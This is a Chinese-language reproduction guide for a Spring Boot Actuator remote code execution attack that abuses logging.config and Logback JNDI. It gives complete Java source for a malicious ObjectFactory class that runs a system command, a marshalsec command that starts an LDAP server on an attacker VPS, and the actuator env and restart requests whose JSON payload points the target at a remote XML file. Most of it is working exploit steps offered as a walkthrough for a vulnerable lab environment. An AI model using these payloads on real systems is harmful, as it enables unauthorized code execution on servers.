restart logging.config logback JNDI RCE
漏洞环境:
https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-restart-rce
漏洞复现:
-
在 VPS 上用 python3 -m http.server 80 命令开启 WEB 服务 -
编写实现 ObjectFactory 接口的恶意类,并上传至 VPS WEB 根目录 import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import javax.naming.Context;
import javax.naming.Name;
import java.io.File;
import java.io.IOException;
import java.util.Hashtable;
public class CommandRaw extends AbstractTranslet implements javax.naming.spi.ObjectFactory{
private static String cmd = "calc.exe";
public CommandRaw() {
String[] var1;
var1 = new String[]{"cmd", "/C", cmd};
try {
Runtime.getRuntime().exec(var1);
} catch (IOException var3) {
var3.printStackTrace();
}
}
public void transform(DOM var1, SerializationHandler[] var2) throws TransletException {
}
public void transform(DOM var1, DTMAxisIterator var2, SerializationHandler var3) throws TransletException {
}
@Override
public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception {
return new Object();
}
}
-
用 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://10.137.204.238:80/#CommandRaw 1389 命令在 VPS 上开启 LDAP 服务 -
访问 actuator/env 接口修改 logging.config 属性值 http://127.0.0.1:9098/actuator/restart
application/json
{"name":"logging.config","value":"http://10.137.204.238/example02.xml"}
-
访问 actuator/restart 接口重启应用 http://127.0.0.1:9098/actuator/restart
application/json
漏洞原理:
通过访问 actuator/env 接口修改 logging.config 属性值,logging.config 属性值指定 Logback 组件的日志配置文件位置,然后重启应用触发目标访问搭建好的恶意 LDAP 服务,造成 LDAP 注入,跟 jolokia logback JNDI RCE 其实大差不差
注意点:
- 恶意类需要实现 ObjectFactory 接口
- VPS 上的 xml 文件内容语法不能为畸形,否则服务器会异常退出
Referenct:
https://github.com/LandGrey/SpringBootVulExploit
|